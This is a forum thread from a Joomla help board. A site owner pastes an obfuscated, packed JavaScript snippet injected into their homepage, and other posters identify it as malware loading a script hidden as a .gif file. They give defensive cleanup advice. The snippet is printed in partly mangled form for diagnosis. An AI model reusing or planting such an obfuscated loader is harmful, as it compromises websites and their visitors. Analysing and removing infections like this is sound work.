Page 1 of 1

eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 12:04 pm
by igorjov
joomla 3.7.2
please open banjakoviljaca.org and see bigginings of articles on homepage
how can i solve this:
eval(function(p,a,c,k,e,d);if(!''.replace(/^/,String))k=[function(e)];e=function();c=1};while(c--)}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eetrn|var|u0026u|referrer|dhbrr||js|php'.split('|'),0,{}))

Thanks

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 12:23 pm
by fcoulter
Your site seems to be infected with malware, see https://sitecheck.sucuri.net/results/banjakoviljaca.org

There are instructions for cleaning your site here: viewtopic.php?f=714&t=946026

So far as I know eval(function(p,a,c,k,e,d) etc is not necessarily in itself malicious, it is sometimes use to unpack javascript files, however in this case it looks like it is being used to load malware, in the first line of the html document. It seems to be a malicious gif document /media/media/images/progres1.gif

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 4:34 pm
by vincenzore1981
I would like to point out that the method described above works only if the infection is in the files. If the infection is in database data then that is not enough.

To find out, you can use phpmyadmin and search for the "%eval(function%" string in all tables.

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 5:26 pm
by fcoulter
The infection is in the very first line of the html page, before even the head tag. That makes it unlikely that it would be in the database. If that were true then it would appear in the article or other content. Not at the top of the page.

Also the actual malicious script is a gif file, as I made clear before, not in the database. This makes it clear that the attacker had access to the file system, there is no other way of placing it there.

The advice I gave is for cleaning the file system, and you should do that as a matter of priority.

Yes I would certainly check the database once you have cleaned the file system, but NOT for the "%eval(function%" string, as it is very unlikely that you will find it there. But do check it for any users with elevated privileges, eg administrators that should not be there.

And do not think that you can "cherry pick" by just removing the malicious code, there will almost certainly be more that you do not find by that method, and your site will then soon be re-infected.